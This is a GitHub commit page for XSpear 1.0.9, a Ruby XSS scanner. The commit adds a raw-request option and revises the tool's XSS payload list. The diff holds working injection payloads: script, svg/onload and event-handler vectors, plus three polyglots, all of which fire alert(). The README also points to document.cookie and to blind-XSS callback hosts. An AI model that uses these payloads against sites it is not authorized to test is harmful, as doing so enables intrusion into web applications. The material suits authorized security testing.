Skip to content

Commit

Permalink
(1.0.9) Releases 1.0.9 / Add --raw options, code refactoring, fixed bugs
Browse files Browse the repository at this point in the history
  • Loading branch information
hahwul committed Jul 25, 2019
1 parent 70e427a commit f67f4ad
Show file tree
Hide file tree
Showing 6 changed files with 43 additions and 21 deletions.
26 changes: 20 additions & 6 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,7 @@ XSpear is XSS Scanner on ruby gems
+ Find SQL Error pattern
+ Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
+ Analysis Other headers..(Server version, Content-Type, etc...)
- Scanning from Raw file(Burp suite, ZAP Request)
- XSpear running on ruby code(with Gem library)
- Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
- Testing at selected parameters
Expand Down Expand Up @@ -64,6 +65,7 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
-d, --data=POST Body [optional] POST Method Body data
--headers=HEADERS [optional] Add HTTP Headers
--cookie=COOKIE [optional] Add Cookie
--raw=FILENAME [optional] Load raw file(e.g raw_sample.txt)
-p, --param=PARAM [optional] Test paramters
-b, --BLIND=URL [optional] Add vector of Blind XSS
+ with XSS Hunter, ezXSS, HBXSS, etc...
Expand All @@ -78,6 +80,7 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
-h, --help Prints this help
--version Show XSpear version
--update Update with online
```
### Result types
- (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
Expand Down Expand Up @@ -180,9 +183,10 @@ __((_)(_)) /(/( /((_))(_))(()\
+----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
< Available Objects >
[cat] param
+ Available Special Char: ' \ ` ] . : ) } [ { $
+ Available Event Handler: "onActivate","onBeforeCopy","onAfterPrint","onAfterUpdate","onAbort","onBeforeActivate","onBeforeDeactivate","onBlur","onBeforeCut","onBounce","onBeforeUnload","onBeforeEditFocus","onBeforePaste","onBeforeUpdate","onBegin","onBeforePrint","onClick","onChange","onControlSelect","onDataSetChanged","onCopy","onDataSetComplete","onContextMenu","onDataAvailable","onCellChange","onCut","onDeactivate","onDblClick","onDragEnd","onDragOver","onDragDrop","onDrop","onDragStart","onDrag","onDragEnter","onDragLeave","onFilterChange","onFocusIn","onEnd","onHelp","onError","onErrorUpdate","onFocus","onFinish","onHashChange","onFocusOut","onLoad","onLoseCapture","onInput","onLayoutComplete","onKeyDown","onMessage","onKeyUp","onMediaError","onMediaComplete","onKeyPress","onMouseOver","onMove","onMouseEnter","onMouseWheel","onMouseLeave","onMoveEnd","onMouseDown","onMouseMove","onMouseUp","onMouseOut","onPropertyChange","onMoveStart","onPaste","onPopState","onOutOfSync","onProgress","onOnline","onReadyStateChange","onOffline","onPause","onResize","onReverse","onRepeat","onRedo","onResizeEnd","onRowExit","onReset","onRowsEnter","onResizeStart","onResume","onRowInserted","onScroll","onStorage","onSelectStart","onRowDelete","onSeek","onSelectionChange","onSelect","onStart","onStop","onUndo","onTrackChange","onURLFlip","onTimeError","onSyncRestored","onSubmit","onUnload"
+ Available HTML Tag: "svg","iframe","script","audio","video","meta","frame","img","embeded","frameset","object","style"
+ Available Special Char: ' \ ` ) [ } : . { ] $
+ Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove"
+ Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame"
+ Available Useful Code: "document.cookie","document.location","window.location"
< Raw Query >
[0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
[1] http://testphp.vulnweb.com/listproducts.php?cat=z?-
Expand All @@ -208,9 +212,19 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
```ruby
require 'XSPear'

s = XspearScan.new "https://www.hahwul.com?target_url", "post_body=thisisbodydata", "CustomHeader: wow", 3, 10, "result.json", "3", "blind-xss-url"
# s = XspearScan.new options.url, options.data, options.headers, options.level, options.thread.to_i, options.output, options.verbose, options.blind
s.run
# Set options
options = {}
options['thread'] = 30
options['cookie'] = "data=123"
options['blind'] = "https://hahwul.xss.ht"
options['output'] = json

# Create XSpear object with url, options
s = XspearScan.new "https://www.hahwul.com?target_url", options

# Scanning
result = s.run
r = JSON.parse result
```

## Add Scanning Module
Expand Down
Binary file removed XSpear-1.0.8.gem
Binary file not shown.
Binary file added XSpear-1.0.9.gem
Binary file not shown.
2 changes: 1 addition & 1 deletion exe/XSpear
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,7 @@ class Parser
end


opts.on('--raw=FILENAME', '[optional] Add HTTP Headers') do |n|
opts.on('--raw=FILENAME', '[optional] Load raw file(e.g raw_sample.txt)') do |n|
args.options['raw'] = n
end

Expand Down
28 changes: 14 additions & 14 deletions lib/XSpear.rb
Original file line number Diff line number Diff line change
Expand Up @@ -406,20 +406,20 @@ def run
r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
end

# Check Selenium Payloads
r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered "+"<script>alert(45)</script>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"><svgonload=alert(1)>', '<svgonload=alert(1)>', 'v', "triggered "+"<svgonload=alert(1)> (x0c)".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered "+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered "+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered "+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered "+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered "+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)

# Check Selenium Polyglot
r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
# Check Selenium Common XSS Payloads
r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)

# Check Selenium XSS Polyglot
r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)


# Check Blind XSS Payload
Expand Down
8 changes: 8 additions & 0 deletions raw_sample.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
GET https://www.hahwul.com/?q=xspear HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Connection: keep-alive
Cookie: _ga=GA1.2.1102548207.1555467144; _gid=GA1.2.1362788908.1563875038
Upgrade-Insecure-Requests: 1
Host: www.hahwul.com

0 comments on commit f67f4ad

Please sign in to comment.